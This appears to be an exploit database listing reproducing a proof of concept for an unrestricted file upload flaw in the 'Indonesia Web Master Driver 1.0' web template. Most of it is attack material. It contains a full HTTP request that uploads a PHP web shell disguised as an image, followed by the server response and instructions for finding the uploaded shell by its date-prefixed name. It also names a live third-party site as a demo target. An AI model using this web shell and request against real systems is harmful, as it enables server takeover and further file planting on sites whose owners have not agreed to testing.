Indonesia Web Master Driver 1.0 - Shell Upload
CVE
Category
Price
Severity
N/A
CWE-434
$500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2022-10-12
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100031 Indonesia Web Master Driver 1.0 - Shell Upload # Exploit Title: Indonesia Web Master Driver 1.0 - Shell Upload
# Date: 10-10-2022
# Exploit Author: X-DEX
# Vendor Homepage:
https://themeforest.net/user/webmasterdriver
# Version: v1.0
# Tested on: Kali Linux
----- POC -----
Note : vulnerability at http://localhost/registact.php
"
$image1=$_FILES["img1"]["name"];
$image2=$_FILES["img2"]["name"];
$newimg1 = date('dmYHis').$image1;
$newimg2 = date('dmYHis').$image2;
move_uploaded_file($_FILES["img1"]["tmp_name"],"image/id/".$newimg1);
move_uploaded_file($_FILES["img2"]["tmp_name"],"image/id/".$newimg2);
"
---------------
Request : URL - http://localhost/registact.php
===============
use burpsuite
POST /registact.php HTTP/1.1
Host: http://localhost
Content-Length: 1007
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLBXMHTxHs8OmgM8w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="MAX_FILE_SIZE"
512000
------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="img1"; filename="m.php"
Content-Type: application/x-php
<?php
echo "<body bgcolor=black>";
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >";
echo "<input type=file name=file size=50>    <input type=submit name=sut value=Upload></form>";
if( isset($_POST['sut']) )
{
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
{
echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>";
}
else {
echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>";
}
}
?>
------WebKitFormBoundaryLBXMHTxHs8OmgM8w--
Response
HTTP/1.1 200 OK
Connection: close
x-powered-by: localhost
set-cookie: PHPSESSID=164455c4fc628fc476d48023c0f44e2e; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-type: text/html; charset=UTF-8
Content-Length: 153
vary: Accept-Encoding,User-Agent
date: Tue, 11 Oct 2022 02:21:20 GMT
server: LiteSpeed
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
<script>alert('Email sudah terdaftar, silahkan gunakan email lain!');</script><script type='text/javascript'> document.location = 'regist.php'; </script>
shell access = http://localhost/image/id/date('dmYHis')m.php
date('dmYHis') use your brain hihihihi
Demo site : https://panjitrans.net/registact.php
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum